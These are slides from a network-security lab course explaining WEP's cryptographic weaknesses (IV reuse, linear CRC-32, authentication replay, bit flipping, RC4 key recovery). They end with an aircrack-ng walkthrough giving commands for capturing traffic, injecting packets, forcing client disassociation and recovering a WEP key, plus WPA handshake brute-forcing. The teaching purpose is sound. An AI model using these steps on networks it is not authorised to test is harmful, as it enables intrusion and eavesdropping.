Upload
duongkhanh
View
218
Download
0
Embed Size (px)
Citation preview
One-Time Pad
• Remember One-Time Pad?
E(M, K) D(CT, K)
M CT M
E(M, K) = M K = CT D(CT, K) = CT K = ? D(CT, K) = D(M K, K) = M K K = M
Sicurezza delle Reti - Esercitazione
K K
One-Time Pad: Bad News
• Fast encryption/decryption (XOR)
• Perfect secrecy ⇒ |K| ≥ |M|
• K and M have same length • Hard to use in practice!
• Idea: • Split M in N chucks of K length ⇒ {𝑴𝟎, 𝑴𝟏, …, 𝑴𝑵} • 𝑪𝑻𝟎 =𝑴𝟎 K, 𝑪𝑻𝟏 =𝑴𝟏 K, … • But…
• 𝑪𝑻𝟎 𝑪𝑻𝟏 = ?? ⇒ 𝑪𝑻𝟎 𝑪𝑻𝟏 = 𝑴𝟎 𝑴𝟏 • Use random key K only once!
Sicurezza delle Reti - Esercitazione
Idea: Stream Cipher
• Replace "random key" by pseudo-random key • Use a Pseudo-Random Generator (PRG)
• Takes a truly random key • Expand key into "random-looking" sequence
PRG: 𝟎, 𝟏 𝒔 → 𝟎, 𝟏 𝒏 , 𝒏 ≫ 𝒔
K: 128-bit ⇒ PRG(K): 𝟏𝟎𝟔-bit
E(M, PRG(K)) D(CT, PRG(K))
M CT M
Sicurezza delle Reti - Esercitazione
K128
K2048 K128
K2048
One-time key-stream?
• Same issue of One-Time Pad • 𝑪𝑻𝟎 𝑪𝑻𝟏 = (𝑴𝟎 𝑲) (𝑴𝟏 𝑲) = 𝑴𝟎 𝑴𝟏
• If one message known ⇒ Other known • Limited entropy • Context information
• Use pseudo-random PRG(K) only once!
• Refresh seed value using "nonce" 𝑲𝒊 = 𝑷𝑹𝑮 𝒏𝒐𝒏𝒄𝒆 | 𝑲)
• Secure if: • Unique "nonce" • Unpredictable PRG:
𝑷𝑹𝑮 𝑿 |𝟎,…,𝒊 ⇏ 𝑷𝑹𝑮 𝑿 |𝒊+𝟏,…,𝒏 Sicurezza delle Reti - Esercitazione
WEP: Wired Equivalent Protocol
• Special purpose for 802.11b • Intended to make wireless as secure as wired… • Intended to provide:
• Authentication • Integrity • Confidentiality
• What is wrong in a protocol that uses:
• RC4 as PRG function • 40-bit key as seed • 24-bit nonce for freshness
Sicurezza delle Reti - Esercitazione
WEP: Protocol
1. <IV || K> used as RC4 seed…MUST BE never repeated (why?) • K is a shared key ⇒ Security depends by IV cycle
2. CRC-32 checksum is linear in XOR (then?) 3. IV generation algorithm is implementation dependent (then?)
1.
3. 2.
Sicurezza delle Reti - Esercitazione
WEP: Changing IV
• Stream Cipher must be synchronized both sides • Not suitable in lossy channels
• WEP Solution:
• Refresh IV per each frame • Can decrypt even if previous packet was lost
• Send IV in cleartext • Not an issue if it does never repeats:
keystream = PRG(IV || K) ⇒ K unknown
Sicurezza delle Reti - Esercitazione
WEP: Changing IV
• WEP standard does not specify IV’s generation algorithm • Left to implementation!
• NEVER do this with security issues • We can choose:
• Incremental generation ⇒ 𝒓𝒊 = 𝒓𝒊−𝟏 + 𝟏 • Only 24-bit IV ⇒ ONLY 𝟐𝟐𝟒 cycles ≈ 𝟏𝟕𝑴 frames • Assuming 1500-byte frames at 7Mbps • IV re-cycle after….less than 8h!
• Random generation • Birthday paradox • 𝑷 𝑰𝑽𝒏 = 𝑰𝑽𝒏−𝒕 > 𝟓𝟎% after… 𝟐𝟏𝟐 ≈ 𝟒𝟎𝟎𝟎 frames
• On some 802.11 cards • IV reset after power cycle
Sicurezza delle Reti - Esercitazione
WEP: Attacks • Passive attack
• Create dictionary: {𝑰𝑽, 𝑹𝑪𝟒 𝑰𝑽 |𝑲)}
• Use known messages to recovery keystream
[𝑴⨁𝑹𝑪𝟒 𝑰𝑽 |𝑲)]⨁M = 𝑹𝑪𝟒 𝑰𝑽 |𝑲)
• Known messages?
• Send an e-mail with large known attachment
• Authentication can help you!
• Wait for IV to repeat 𝑴′⨁𝑹𝑪𝟒 𝑰𝑽 𝑲 ]⨁𝑹𝑪𝟒 𝑰𝑽 𝑲 = 𝑴′
• Idea:
• We can use longer key K (e.g. > 40 bit)
• IV still 24 bits ⇒ Same attack time!! Sicurezza delle Reti - Esercitazione
WEP: Authentication
• Authentication based on Challenge Handshake
• User must prove knowledge of K
• Encrypt the challenge using symmetric cipher
Challenge
ENCK(Challenge)
Sicurezza delle Reti - Esercitazione
WEP: Authentication
• Authentication based on Challenge Handshake
• User must prove knowledge of K
• Encrypt the challenge using symmetric cipher
• Same key RC4(IV || K) as frame encryption
Challenge
IV, Challenge RC4(IV || K)
Sicurezza delle Reti - Esercitazione
WEP: Authentication
• Rogue Access Point
• Sends multiple Challenges to user
• Retrieve multiple 𝑰𝑽𝒏, 𝑹𝑪𝟒 𝑰𝑽𝒏 |𝑲) pairs
• Reuse recovered pairs on the authenticator
Challenge: 𝑪𝒏
𝑰𝑽𝒏, 𝑪𝒏 𝑹𝑪𝟒 𝑰𝑽𝒏 |𝑲)
Sicurezza delle Reti - Esercitazione
WEP: Authentication
• No need to know key
• AP sends challenge C
• Attacker chooses 𝑰𝑽𝒙 from dictionary
• Can compute 𝑪 𝑹𝑪𝟒 𝑰𝑽𝒙 𝑲
• Authentication successful!
Challenge: 𝑪
𝑰𝑽𝒙, 𝑪 𝑹𝑪𝟒 𝑰𝑽𝒙 |𝑲)
Sicurezza delle Reti - Esercitazione
WEP: Authentication
• If no active attack possible
• If no IV avaible
• Just eavesdrop ONE authentication
• Attacker can recover a valid 𝑰𝑽, 𝑹𝑪𝟒 𝑰𝑽 𝑲 pair
Challenge: 𝑪
𝑰𝑽𝒙, 𝑪 𝑹𝑪𝟒 𝑰𝑽𝒙 |𝑲)
Sicurezza delle Reti - Esercitazione
Example: Bit Flipping
Bob ⨁ PRG(K) Eve ⨁ PRG(K)
B o b E v e
42 6F 62 45 76 65 ⨁
07 19 07
⨁
𝚫𝑴
𝑴 𝑴′
Sicurezza delle Reti - Esercitazione
WEP: Integrity
• Useless encryption, what about integrity?
• CRC-32 of message as Integrity Check Value
• CRC-32 is NOT an hash function!
• Linear function:
𝑪𝑹𝑪𝟑𝟐 𝑿⨁𝒀 = 𝑪𝑹𝑪𝟑𝟐 𝑿 ⨁ 𝑪𝑹𝑪𝟑𝟐(𝒀)
• USE crypto algorithms to verify integrity!
• Avoid messages authentication!
• Conseguences:
• Message modification (bit flipping)!
• Message injection!
Sicurezza delle Reti - Esercitazione
WEP: Message modification
• Simple operations to switch M to M’
• No need to know keystream
• Flipped bits computing: 𝑪𝑻′ = 𝑪𝑻 ⨁ (𝚫𝑴 𝑪𝑹𝑪(𝚫𝑴))
• 𝑪𝑻′ is an encrypted message with valid ICV!
𝐂𝐓 = 𝐌 𝐂𝐑𝐂 𝐌 ⨁𝑹𝑪𝟒 𝑰𝑽 |𝑲)
𝐂𝐓′ = 𝐌′ 𝐂𝐑𝐂 𝑴′ ⨁𝑹𝑪𝟒 𝑰𝑽 |𝑲)
Sicurezza delle Reti - Esercitazione
WEP: Message injection
• Attacker knows how to recover: 𝐈𝐕, 𝑹𝑪𝟒 𝑰𝑽 𝑲
• Attacker can inject message 𝑴′
• Authenticate 𝑴′ computing CRC32(𝑴′)
• Encrypt message and send frame
𝑰𝑽, 𝐌′ 𝐂𝐑𝐂 𝑴′ ⨁𝑹𝑪𝟒 𝑰𝑽 |𝑲)
𝑰𝑽, 𝐌′ 𝐂𝐑𝐂 𝑴′ ⨁𝑹𝑪𝟒 𝑰𝑽 |𝑲)
Sicurezza delle Reti - Esercitazione
WEP Teaching
• Make use of good cipher is not enough: • YOU MUST design good protocols • YOU MUST make good usage of ciphers
• The best protocol with the best cipher Could be the worst solution!
• YOU MUST avoid confusion
e.g. Integrity is not Authentication
Sicurezza delle Reti - Esercitazione
Could get even worse?
• Is it possible to recover the key K? Yes!
• Cryptoanalytic attacks on RC4:
1. Fluhrer, Mantin e Shamir (show weakness)
• There are some "weak" IVs correlated to keystream - 5% probability, a byte in the keystream is equal to a byte in the key
- 4-6 million of packets ⇒ 50% probability to recover K
2. Stubblefield, Ioannidis, Rubin (use weakness)
• Focus on discovery of first bit of keystream
- 802.11 uses SNAP LLC encapsulation ⇒ 1st byte known (0xAA)
- Attack time linear with key-size
3. Others… Sicurezza delle Reti - Esercitazione
802.11 aftermath • Optimized WEP attacks ⇒ WEP DEATH!
• WPA: a temporary solution (2003) • Based on Temporal Key Integrity Protocol (TKIP)
• Maintain hardware compatibility
• Longer IVs (48 bit)
• IV protection ⇒ IV in RC4 differs from IV in plaintext
• Ephemeral derivation of key K ⇒ Time changing
• WPA-2: a definitive solution (2004) • Similar to WPA but:
• Based on newer AES encryption ⇒ Needs new hardware
• Support for server authentication
Sicurezza delle Reti - Esercitazione
http://aircrack-ng.org/
Sicurezza delle Reti - Esercitazione
Aircrack-ng
Sicurezza delle Reti - Esercitazione
• Open-source suite providing:
• Packet sniffer: airodump-ng
• Password Cracker: aircrack-ng
• Packet injection tool: aireplay-ng
• Others…
• Many key recovery attacks:
• Pyshkin, Tews e Weinmann (PTW)
• Only 35-40k packets for 128-bit key
• Fluhrer, Mantin e Shamir
• Brute-force attack (also on WPA/WPA-2 handshake)
Aircrack-ng: Setup
Sicurezza delle Reti - Esercitazione
• Need to switch wireless card on Monitor Mode
• Different by Promiscuous Mode: no need to be associated
• Only supported wireless cards
• Atheros, Linksys, …
• Need to install proper drivers
• Need to patch proper firmware
Now you can sniff all packets over the wireless channel!
Aircrack-ng: airmon
• airmon-ng start <wireless_id> (e.g. wlan0)
• service network-manager stop (kill NM service)
Aircrack-ng: airmon
• Check wireless interfaces: iwconfig
• wlan0: physical interface
• mon0: virtual interface
Aircrack-ng: airodump
• Let’s see the list of avaible networks: airodump-ng mon0
Networks
Clients
Aircrack-ng: airodump
• Airodump is the sniffing tool
• Can be used to see the list of avaible networks
• Can be used to sniff and save the trace of a network
1. Choose the target WEP network: 76:6A:89:54:4A:A4
• At least a client connected
• More sniffed traffic: less crack time
2. Filter networks flow: --bssid <network_bssid>
3. Save packets trace: -w <file.pcap>
Aircrack-ng: airodump
• Start target sniffing:
airodump-ng -w wep --bssid 76:6A:89:54:4A:A4 mon0
Increase that!
Aircrack-ng: airodump
• Wait until #Data reach reasonable value
• Small passphrase ≈ 𝟏𝟎𝒌
• Long passphrase ≈ 𝟒𝟎𝒌
Enough?
Aircrack-ng: aircrack
• The traffic trace is stored in .pcap file wep-01.pcap
• Start aircrack tool to retrieve passphrase
aircrack-ng wep-01.pcap
Aircrack-ng: need traffic
• If not enough traffic in the network
• Injection of packets in the network: aireplay-ng 1. Replay of sniffed ARP packets
2. Force disassiociation of clients
• Sniff reassociation packets
• To perform packet injection
• You need to presents to AP as an authenticated client
aireplay-ng + macchanger
What about WPA?
• No efficient methods to crack WPA/WPA-2
• Only bruteforce attack on keystream
1. Sniff the 4-way handshake
2. Start the bruteforce attack on WPA Key
• Complexity depends on password complexity
• Think some default passwords of some vendors
S = f(MAC) very weak
• Useless WPA protection…